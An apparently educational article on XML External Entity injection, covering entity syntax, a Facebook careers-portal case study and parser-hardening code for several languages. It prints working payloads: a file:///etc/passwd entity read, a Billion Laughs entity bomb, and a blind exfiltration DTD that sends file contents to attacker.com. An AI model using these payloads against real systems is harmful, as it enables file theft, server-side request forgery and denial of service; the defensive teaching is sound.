Luke Sun

XML External Entity (XXE) Injection

1. Definition

XML External Entity (XXE) Injection is a vulnerability that targets applications parsing XML input. It exploits a feature of XML called “external entities” to:

  • Read arbitrary files from the server
  • Perform Server-Side Request Forgery (SSRF)
  • Launch denial-of-service attacks
  • In some cases, achieve remote code execution (for example, through PHP’s expect:// wrapper when the expect extension is loaded)

XXE vulnerabilities arise when XML parsers are configured to process external entity declarations, which can reference local files or remote URLs.

2. Technical Explanation

XML allows defining entities as shortcuts for content. External entities can reference content from outside the XML document.

Basic XML Entity Syntax:

<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY myEntity "Hello World">
]>
<root>&myEntity;</root>
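
To see entity substitution happen, here is a minimal Python sketch that parses the document above with the standard library’s xml.etree.ElementTree, which expands entities declared in the internal DTD subset. The constant and function names are illustrative, not part of any API.

```python
import xml.etree.ElementTree as ET

# The document from the example above: one internal entity, referenced once.
DOCUMENT = """<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY myEntity "Hello World">
]>
<root>&myEntity;</root>"""


def root_text(document: str) -> str:
    """Parse the document and return the text content of its root element."""
    return ET.fromstring(document).text


print(root_text(DOCUMENT))
```

The application never sees the reference &myEntity; itself, only the substituted text. That is why entity handling has to be controlled in the parser configuration rather than in application code.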

External Entity (XXE) Payload:

<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>&xxe;</root>

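When a parser with external entity resolution enabled processes this document, it replaces &xxe; with the contents of /etc/passwd. If the application echoes the parsed value back in its response, the attacker can read the file.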

Common XXE Attack Types:

  1. File Disclosure: Read sensitive files (/etc/passwd, config files, source code).
  2. SSRF: Make the server send requests to internal services, such as the cloud metadata endpoint at http://169.254.169.254/.
  3. Blind XXE: Exfiltrate data via out-of-band channels when output is not returned.
  4. Billion Laughs (DoS): Exponentially expanding entities exhaust the parser’s memory.

Billion Laughs Attack:

<?xml version="1.0"?>
<!DOCTYPE lolz [
  <!ENTITY lol "lol">
  <!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
  <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
  <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
]>
<root>&lol4;</root>

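As written, this abbreviated payload expands to only 1,000 copies of "lol" (about 3 KB). The full attack continues the same pattern for several more levels. Each level multiplies the output by ten, so ten levels (lol10 in this naming) produce a billion copies, roughly 3 GB in memory, from a payload of about a kilobyte.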
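
The growth is easier to judge with numbers. The sketch below computes the expanded size for a given nesting depth, assuming the naming used in the payload above: lol is level 1, and each further level repeats the previous one ten times. The function and parameter names are illustrative.

```python
def expanded_bytes(levels: int, fanout: int = 10, seed: str = "lol") -> int:
    """Size in bytes of the fully expanded top-level entity.

    Level 1 is the seed string itself; every further level repeats
    the previous level `fanout` times.
    """
    if levels < 1:
        raise ValueError("levels must be at least 1")
    return len(seed.encode("utf-8")) * fanout ** (levels - 1)


for levels in (4, 10):
    print(f"lol{levels}: {expanded_bytes(levels):,} bytes")
```

Four levels give 3,000 bytes and ten levels give 3,000,000,000 bytes. The billion copies of "lol" at ten levels are where the attack gets its name.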

3. Attack Flow

sequenceDiagram
    participant Attacker
    participant WebApp as Web Application
    participant XMLParser as XML Parser
    participant FileSystem as File System

    Attacker->>WebApp: POST /api/upload<br/>Content-Type: application/xml

    Note over Attacker: XML payload with<br/>external entity definition

    WebApp->>XMLParser: Parse XML input

    XMLParser->>XMLParser: Process DOCTYPE declaration<br/>Found external entity

    XMLParser->>FileSystem: Read file:///etc/passwd

    FileSystem-->>XMLParser: File contents returned

    XMLParser-->>WebApp: Parsed XML with file contents

    WebApp-->>Attacker: Response contains /etc/passwd

4. Real-World Case Study: Facebook XXE (2014)

Target: Facebook’s careers portal. Vulnerability Class: Blind XXE via Word document upload.

The Vulnerability: Facebook’s careers page allowed users to upload resumes. The application accepted .docx files, which are actually ZIP archives containing XML files. The XML parser processing these files had external entity processing enabled.

The Attack: Security researcher Mohamed Ramadan exploited this as follows:

  1. .docx files contain XML files (e.g., word/document.xml).
  2. He crafted a malicious .docx with an XXE payload in the XML.
  3. The payload referenced an external URL he controlled.
  4. When Facebook parsed the document, it made a request to his server.
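
Because a .docx is just a ZIP archive, its XML parts can be inspected before any XML parser touches them. The following is a minimal sketch of such a pre-check, not a description of what Facebook deployed. It assumes that legitimate Word documents never declare a DOCTYPE in their parts, and the helper names parts_with_doctype and build_sample are hypothetical.

```python
import io
import zipfile

DOCTYPE_MARKER = b"<!DOCTYPE"


def parts_with_doctype(docx_bytes: bytes) -> list[str]:
    """Return the names of XML parts in the archive that contain a DOCTYPE.

    Note: this reads each part fully into memory and only matches
    single-byte encodings such as UTF-8; a production check would also
    cap the decompressed size and handle UTF-16 parts.
    """
    flagged = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as archive:
        for name in archive.namelist():
            if name.endswith((".xml", ".rels")) and DOCTYPE_MARKER in archive.read(name):
                flagged.append(name)
    return flagged


def build_sample(document_xml: bytes) -> bytes:
    """Build a tiny in-memory archive that mimics the layout of a .docx."""
    buffer = io.BytesIO()
    with zipfile.ZipFile(buffer, "w") as archive:
        archive.writestr("[Content_Types].xml", b"<Types/>")
        archive.writestr("word/document.xml", document_xml)
    return buffer.getvalue()


malicious = build_sample(
    b'<!DOCTYPE foo [<!ENTITY % dtd SYSTEM "http://attacker.com/evil.dtd"> %dtd;]><document/>'
)
print(parts_with_doctype(malicious))
```

A check like this is a coarse filter at best. The dependable fix remains configuring the parser itself to refuse DTDs and external entities.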

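Blind XXE Exfiltration: Since the file contents were not directly returned, he used parameter entities to exfiltrate data. The document loads the target file into a parameter entity, then pulls in an attacker-hosted DTD that builds a URL containing that data: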

<!DOCTYPE foo [
  <!ENTITY % file SYSTEM "file:///etc/passwd">
  <!ENTITY % dtd SYSTEM "http://attacker.com/evil.dtd">
  %dtd;
]>
<foo>&send;</foo>

The external DTD (evil.dtd) contained:

<!ENTITY % all "<!ENTITY send SYSTEM 'http://attacker.com/?data=%file;'>">
%all;

Impact: The technique could expose arbitrary files from Facebook’s servers. Ramadan received a bug bounty for the report, and Facebook patched the vulnerability by disabling external entity processing.

5. Detailed Defense Strategies

A. Disable External Entity Processing

The most effective defense is to disable external entities entirely.

Java (DocumentBuilderFactory):

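DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
// Reject any document that contains a DOCTYPE; this alone blocks XXE and entity expansion.
dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
// Defense in depth, in case DOCTYPE declarations ever have to be allowed.
dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
dbf.setXIncludeAware(false);
dbf.setExpandEntityReferences(false);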

Python (lxml):

from lxml import etree

parser = etree.XMLParser(resolve_entities=False, no_network=True)
tree = etree.parse(xml_file, parser)
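
For code that uses the standard library’s SAX parser rather than lxml, the equivalent switches are the external-entity features in xml.sax.handler. The sketch below is one possible setup. TextCollector and parse_text_safely are illustrative names, and the helper simply returns the concatenated character data of the document.

```python
import io
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges, feature_external_pes


class TextCollector(ContentHandler):
    """Collects all character data reported by the parser."""

    def __init__(self):
        super().__init__()
        self.chunks = []

    def characters(self, content):
        self.chunks.append(content)


def parse_text_safely(xml_bytes: bytes) -> str:
    """Parse XML with external entities disabled and return its text content."""
    parser = xml.sax.make_parser()
    # External general entities are off by default since Python 3.7.1;
    # setting both features explicitly documents the intent.
    parser.setFeature(feature_external_ges, False)
    parser.setFeature(feature_external_pes, False)
    collector = TextCollector()
    parser.setContentHandler(collector)
    parser.parse(io.BytesIO(xml_bytes))
    return "".join(collector.chunks)


print(parse_text_safely(b"<root>hello</root>"))
```

With these features off, a reference to an external entity is skipped instead of being resolved, so the referenced file or URL is never fetched.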

PHP:

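// Needed only before PHP 8.0; the function is deprecated from 8.0 on, where external entity loading is off by default.
if (PHP_VERSION_ID < 80000) { libxml_disable_entity_loader(true); }
$doc = new DOMDocument();
// Never pass LIBXML_NOENT or LIBXML_DTDLOAD: they turn entity substitution and DTD loading back on.
$doc->loadXML($xml, LIBXML_NONET);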

.NET:

XmlReaderSettings settings = new XmlReaderSettings();
settings.DtdProcessing = DtdProcessing.Prohibit;
settings.XmlResolver = null;
XmlReader reader = XmlReader.Create(stream, settings);

B. Use Less Complex Data Formats

If possible, avoid XML entirely for user input.

  • JSON: Does not have entity processing features.
  • YAML: No external entities, but it has its own security concerns (for example, unsafe object deserialization in some loaders).
  • Protocol Buffers / MessagePack: Binary formats without these risks.

C. Input Validation

If XML is required, validate and sanitize input.

  • Schema Validation: Use XSD to enforce structure.
  • Strip DOCTYPE: Remove or reject XML with DOCTYPE declarations.
  • Content-Type Checking: Ensure uploaded files match expected types.
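
Rejecting DOCTYPE declarations is more reliable when the check runs inside a parser rather than as a string match on the raw input. As a minimal sketch, assuming the application never needs DTDs, the following uses the standard library’s xml.parsers.expat and aborts as soon as a DOCTYPE is seen. DoctypeForbidden and reject_doctype are hypothetical names.

```python
import xml.parsers.expat


class DoctypeForbidden(ValueError):
    """Raised when a document contains a DOCTYPE declaration."""


def reject_doctype(xml_bytes: bytes) -> None:
    """Raise DoctypeForbidden if the document declares a DOCTYPE.

    Malformed XML still raises xml.parsers.expat.ExpatError.
    """
    parser = xml.parsers.expat.ParserCreate()

    def on_doctype(name, system_id, public_id, has_internal_subset):
        # Called when the parser reaches the DOCTYPE declaration.
        raise DoctypeForbidden(f"DOCTYPE declaration not allowed: {name!r}")

    parser.StartDoctypeDeclHandler = on_doctype
    parser.Parse(xml_bytes, True)


reject_doctype(b"<root>ok</root>")  # passes silently
```

Call this before handing the input to the real parser and treat DoctypeForbidden as a rejected upload. Because the parser decodes the input itself, the check does not depend on how the document is encoded.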

D. Web Application Firewall (WAF)

Configure WAF rules to detect XXE patterns.

  • Block requests containing <!ENTITY, <!DOCTYPE, SYSTEM, PUBLIC.
  • Be aware that attackers may use encoding to bypass simple pattern matching.
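
The encoding caveat is easy to demonstrate. The sketch below uses a deliberately naive byte-level rule (NAIVE_RULE and naive_waf_blocks are illustrative, not taken from any real WAF) and shows that the same payload passes once it is encoded as UTF-16, an encoding every conforming XML parser must accept.

```python
import re

# A simplistic rule of the kind described above: match the raw ASCII bytes.
NAIVE_RULE = re.compile(rb"<!(DOCTYPE|ENTITY)")


def naive_waf_blocks(body: bytes) -> bool:
    """Return True if the naive rule would block this request body."""
    return NAIVE_RULE.search(body) is not None


PAYLOAD = (
    '<?xml version="1.0"?>'
    '<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>'
    "<root>&xxe;</root>"
)

utf8_body = PAYLOAD.encode("utf-8")
utf16_body = PAYLOAD.encode("utf-16")  # byte-order mark plus two bytes per character

print(naive_waf_blocks(utf8_body))   # True
print(naive_waf_blocks(utf16_body))  # False
```

The UTF-16 body interleaves a zero byte with every ASCII character, so the byte pattern never matches even though the parser sees an identical document. WAF rules are therefore a supplementary layer, not a replacement for hardening the parser.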

E. Least Privilege

Limit the XML parser’s access.

  • Filesystem: Run parser in sandboxed environment with minimal file access.
  • Network: Block outbound connections from XML processing services.
  • User Permissions: Parser process should not run as root.
